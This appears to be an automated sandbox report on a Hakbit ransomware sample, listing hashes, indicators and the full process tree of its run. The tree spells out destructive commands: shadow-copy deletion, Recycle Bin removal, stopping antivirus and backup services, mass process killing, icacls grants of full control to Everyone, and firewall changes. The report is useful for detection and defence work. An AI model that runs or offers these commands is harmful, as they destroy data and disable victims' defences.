Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
19/04/2021, 17:52
Static task
static1
Behavioral task
behavioral1
Sample
SyncApteka.bin.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
SyncApteka.bin.exe
Resource
win10v20210410
General
-
Target
SyncApteka.bin.exe
-
Size
128KB
-
MD5
9606a0bdc7a04dcf4d8625345c2875cd
-
SHA1
34c37511ef2105aedf55eda054e89210757f51ec
-
SHA256
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7
-
SHA512
64796dde9fe7791e166cecb622d7713ef3a6947e404919eaba27c532fdf3be799f8ead904402a5b9dfff27977813c77e1c86954801c7bc4a867265d6aa36a595
Malware Config
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
hakbit
Signatures
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 15884 dismhost.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\ConvertFromGroup.raw.ejqvfp SyncApteka.bin.exe File opened for modification C:\Users\Admin\Pictures\NewMount.raw.ejqvfp SyncApteka.bin.exe File renamed C:\Users\Admin\Pictures\ConvertFromGroup.raw => C:\Users\Admin\Pictures\ConvertFromGroup.raw.ejqvfp SyncApteka.bin.exe File renamed C:\Users\Admin\Pictures\NewMount.raw => C:\Users\Admin\Pictures\NewMount.raw.ejqvfp SyncApteka.bin.exe File renamed C:\Users\Admin\Pictures\OptimizeUse.tiff => C:\Users\Admin\Pictures\OptimizeUse.tiff.ejqvfp SyncApteka.bin.exe File opened for modification C:\Users\Admin\Pictures\OptimizeUse.tiff.ejqvfp SyncApteka.bin.exe File renamed C:\Users\Admin\Pictures\StepSet.raw => C:\Users\Admin\Pictures\StepSet.raw.ejqvfp SyncApteka.bin.exe File opened for modification C:\Users\Admin\Pictures\StepSet.raw.ejqvfp SyncApteka.bin.exe File renamed C:\Users\Admin\Pictures\UnpublishInstall.png => C:\Users\Admin\Pictures\UnpublishInstall.png.ejqvfp SyncApteka.bin.exe File opened for modification C:\Users\Admin\Pictures\UnpublishInstall.png.ejqvfp SyncApteka.bin.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk SyncApteka.bin.exe -
Loads dropped DLL 5 IoCs
pid Process 15884 dismhost.exe 15884 dismhost.exe 15884 dismhost.exe 15884 dismhost.exe 15884 dismhost.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 13184 icacls.exe 13176 icacls.exe 13168 icacls.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log powershell.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 16840 net.exe -
Kills process with taskkill 48 IoCs
pid Process 8352 taskkill.exe 4136 taskkill.exe 8344 taskkill.exe 9280 taskkill.exe 9256 taskkill.exe 9396 taskkill.exe 10940 taskkill.exe 7776 taskkill.exe 9316 taskkill.exe 9288 taskkill.exe 8172 taskkill.exe 4628 taskkill.exe 8520 taskkill.exe 9376 taskkill.exe 9360 taskkill.exe 9348 taskkill.exe 9268 taskkill.exe 10004 taskkill.exe 4824 taskkill.exe 7884 taskkill.exe 9324 taskkill.exe 9304 taskkill.exe 9176 taskkill.exe 13148 taskkill.exe 8528 taskkill.exe 8676 taskkill.exe 9368 taskkill.exe 9332 taskkill.exe 7608 taskkill.exe 8320 taskkill.exe 9384 taskkill.exe 9296 taskkill.exe 4560 taskkill.exe 7816 taskkill.exe 8060 taskkill.exe 4448 taskkill.exe 4724 taskkill.exe 6100 taskkill.exe 10884 taskkill.exe 396 taskkill.exe 4636 taskkill.exe 8188 taskkill.exe 8424 taskkill.exe 8480 taskkill.exe 9340 taskkill.exe 9244 taskkill.exe 10964 taskkill.exe 8544 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4016 reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 15128 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 13820 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe 2204 SyncApteka.bin.exe -
Suspicious use of AdjustPrivilegeToken 52 IoCs
description pid Process Token: SeDebugPrivilege 2204 SyncApteka.bin.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 9340 taskkill.exe Token: SeDebugPrivilege 9384 taskkill.exe Token: SeDebugPrivilege 9376 taskkill.exe Token: SeDebugPrivilege 9396 taskkill.exe Token: SeDebugPrivilege 9176 taskkill.exe Token: SeDebugPrivilege 9256 taskkill.exe Token: SeDebugPrivilege 9348 taskkill.exe Token: SeDebugPrivilege 9296 taskkill.exe Token: SeDebugPrivilege 9360 taskkill.exe Token: SeDebugPrivilege 9244 taskkill.exe Token: SeDebugPrivilege 9288 taskkill.exe Token: SeDebugPrivilege 4560 taskkill.exe Token: SeDebugPrivilege 9368 taskkill.exe Token: SeDebugPrivilege 10884 taskkill.exe Token: SeDebugPrivilege 9324 taskkill.exe Token: SeDebugPrivilege 9280 taskkill.exe Token: SeDebugPrivilege 9268 taskkill.exe Token: SeDebugPrivilege 9304 taskkill.exe Token: SeDebugPrivilege 9332 taskkill.exe Token: SeDebugPrivilege 9316 taskkill.exe Token: SeDebugPrivilege 8344 taskkill.exe Token: SeDebugPrivilege 8676 taskkill.exe Token: SeDebugPrivilege 7884 taskkill.exe Token: SeDebugPrivilege 10940 taskkill.exe Token: SeDebugPrivilege 10004 taskkill.exe Token: SeDebugPrivilege 4724 taskkill.exe Token: SeDebugPrivilege 4636 taskkill.exe Token: SeDebugPrivilege 4448 taskkill.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 10964 taskkill.exe Token: SeDebugPrivilege 8544 taskkill.exe Token: SeDebugPrivilege 4628 taskkill.exe Token: SeDebugPrivilege 8172 taskkill.exe Token: SeDebugPrivilege 7608 taskkill.exe Token: SeDebugPrivilege 6100 taskkill.exe Token: SeDebugPrivilege 8424 taskkill.exe Token: SeDebugPrivilege 8528 taskkill.exe Token: SeDebugPrivilege 8352 taskkill.exe Token: SeDebugPrivilege 8060 taskkill.exe Token: SeDebugPrivilege 7816 taskkill.exe Token: SeDebugPrivilege 8320 taskkill.exe Token: SeDebugPrivilege 4136 taskkill.exe Token: SeDebugPrivilege 8188 taskkill.exe Token: SeDebugPrivilege 8480 taskkill.exe Token: SeDebugPrivilege 8520 taskkill.exe Token: SeDebugPrivilege 7356 powershell.exe Token: SeDebugPrivilege 13148 taskkill.exe Token: SeDebugPrivilege 13160 powershell.exe Token: SeBackupPrivilege 7356 powershell.exe Token: SeRestorePrivilege 7356 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2204 SyncApteka.bin.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2204 SyncApteka.bin.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2204 wrote to memory of 396 2204 SyncApteka.bin.exe 78 PID 2204 wrote to memory of 396 2204 SyncApteka.bin.exe 78 PID 2204 wrote to memory of 4072 2204 SyncApteka.bin.exe 167 PID 2204 wrote to memory of 4072 2204 SyncApteka.bin.exe 167 PID 2204 wrote to memory of 4016 2204 SyncApteka.bin.exe 817 PID 2204 wrote to memory of 4016 2204 SyncApteka.bin.exe 817 PID 2204 wrote to memory of 3160 2204 SyncApteka.bin.exe 166 PID 2204 wrote to memory of 3160 2204 SyncApteka.bin.exe 166 PID 2204 wrote to memory of 3588 2204 SyncApteka.bin.exe 147 PID 2204 wrote to memory of 3588 2204 SyncApteka.bin.exe 147 PID 2204 wrote to memory of 4044 2204 SyncApteka.bin.exe 143 PID 2204 wrote to memory of 4044 2204 SyncApteka.bin.exe 143 PID 2204 wrote to memory of 4112 2204 SyncApteka.bin.exe 135 PID 2204 wrote to memory of 4112 2204 SyncApteka.bin.exe 135 PID 2204 wrote to memory of 4140 2204 SyncApteka.bin.exe 89 PID 2204 wrote to memory of 4140 2204 SyncApteka.bin.exe 89 PID 2204 wrote to memory of 4172 2204 SyncApteka.bin.exe 90 PID 2204 wrote to memory of 4172 2204 SyncApteka.bin.exe 90 PID 2204 wrote to memory of 4216 2204 SyncApteka.bin.exe 132 PID 2204 wrote to memory of 4216 2204 SyncApteka.bin.exe 132 PID 2204 wrote to memory of 4252 2204 SyncApteka.bin.exe 131 PID 2204 wrote to memory of 4252 2204 SyncApteka.bin.exe 131 PID 2204 wrote to memory of 4316 2204 SyncApteka.bin.exe 94 PID 2204 wrote to memory of 4316 2204 SyncApteka.bin.exe 94 PID 2204 wrote to memory of 4344 2204 SyncApteka.bin.exe 129 PID 2204 wrote to memory of 4344 2204 SyncApteka.bin.exe 129 PID 2204 wrote to memory of 4368 2204 SyncApteka.bin.exe 95 PID 2204 wrote to memory of 4368 2204 SyncApteka.bin.exe 95 PID 2204 wrote to memory of 4400 2204 SyncApteka.bin.exe 403 PID 2204 wrote to memory of 4400 2204 SyncApteka.bin.exe 403 PID 2204 wrote to memory of 4444 2204 SyncApteka.bin.exe 125 PID 2204 wrote to memory of 4444 2204 SyncApteka.bin.exe 125 PID 2204 wrote to memory of 4480 2204 SyncApteka.bin.exe 387 PID 2204 wrote to memory of 4480 2204 SyncApteka.bin.exe 387 PID 2204 wrote to memory of 4520 2204 SyncApteka.bin.exe 98 PID 2204 wrote to memory of 4520 2204 SyncApteka.bin.exe 98 PID 2204 wrote to memory of 4556 2204 SyncApteka.bin.exe 198 PID 2204 wrote to memory of 4556 2204 SyncApteka.bin.exe 198 PID 2204 wrote to memory of 4592 2204 SyncApteka.bin.exe 100 PID 2204 wrote to memory of 4592 2204 SyncApteka.bin.exe 100 PID 2204 wrote to memory of 4628 2204 SyncApteka.bin.exe 451 PID 2204 wrote to memory of 4628 2204 SyncApteka.bin.exe 451 PID 2204 wrote to memory of 4664 2204 SyncApteka.bin.exe 102 PID 2204 wrote to memory of 4664 2204 SyncApteka.bin.exe 102 PID 2204 wrote to memory of 4704 2204 SyncApteka.bin.exe 103 PID 2204 wrote to memory of 4704 2204 SyncApteka.bin.exe 103 PID 2204 wrote to memory of 4748 2204 SyncApteka.bin.exe 104 PID 2204 wrote to memory of 4748 2204 SyncApteka.bin.exe 104 PID 2204 wrote to memory of 4788 2204 SyncApteka.bin.exe 105 PID 2204 wrote to memory of 4788 2204 SyncApteka.bin.exe 105 PID 2204 wrote to memory of 4828 2204 SyncApteka.bin.exe 114 PID 2204 wrote to memory of 4828 2204 SyncApteka.bin.exe 114 PID 4444 wrote to memory of 4864 4444 net.exe 113 PID 4444 wrote to memory of 4864 4444 net.exe 113 PID 4400 wrote to memory of 4888 4400 Conhost.exe 106 PID 4400 wrote to memory of 4888 4400 Conhost.exe 106 PID 2204 wrote to memory of 4908 2204 SyncApteka.bin.exe 264 PID 2204 wrote to memory of 4908 2204 SyncApteka.bin.exe 264 PID 2204 wrote to memory of 4948 2204 SyncApteka.bin.exe 109 PID 2204 wrote to memory of 4948 2204 SyncApteka.bin.exe 109 PID 4480 wrote to memory of 4960 4480 net1.exe 108 PID 4480 wrote to memory of 4960 4480 net1.exe 108 PID 4520 wrote to memory of 4972 4520 net.exe 107 PID 4520 wrote to memory of 4972 4520 net.exe 107 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" SyncApteka.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" SyncApteka.bin.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe"C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2204 -
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:4072
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:4016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵PID:4500
-
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:3160
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:3588
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:4044
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:4140
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4172
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵PID:4316
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:4368
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start upnphost /y2⤵PID:4480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵PID:4960
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:4972
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:4556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:5012
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵PID:4592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:5096
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:4628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:3932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y4⤵PID:14652
-
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:4664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:2480
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:8636
-
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4704
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:4748
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop bedbg /y2⤵PID:4788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:4044
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:4220
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:4228
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start FDResPub /y2⤵PID:4828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵PID:4280
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start SSDPSRV /y2⤵
- Suspicious use of WriteProcessMemory
PID:4444
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" start Dnscache /y2⤵PID:4400
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:4344
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:4252
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:4216
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:4112
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:5068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:4916
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:5024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:4348
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:4108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:4072
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2660
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:5140
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:4312
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3588
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:5128
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:5280
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:5228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:11932
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:5180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:11040
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:10868
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:3160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:10856
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MMS /y2⤵PID:4872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:9976
-
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4600
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:4356
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4256
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EhttpSrv /y2⤵PID:4412
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:4184
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:5332
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:5632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:13524
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:6420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:14708
-
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9396
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10964
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:13184
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:13176
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:13168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:13160
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:13148
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8172
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8544
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10940
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10004
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6100
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8188
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8352
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7608
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8320
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7816
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8424
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8060
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8528
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8480
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7884
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8520
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8344
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8676
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:7776
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10884
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9384
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9376
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9368
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9360
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9348
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9340
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
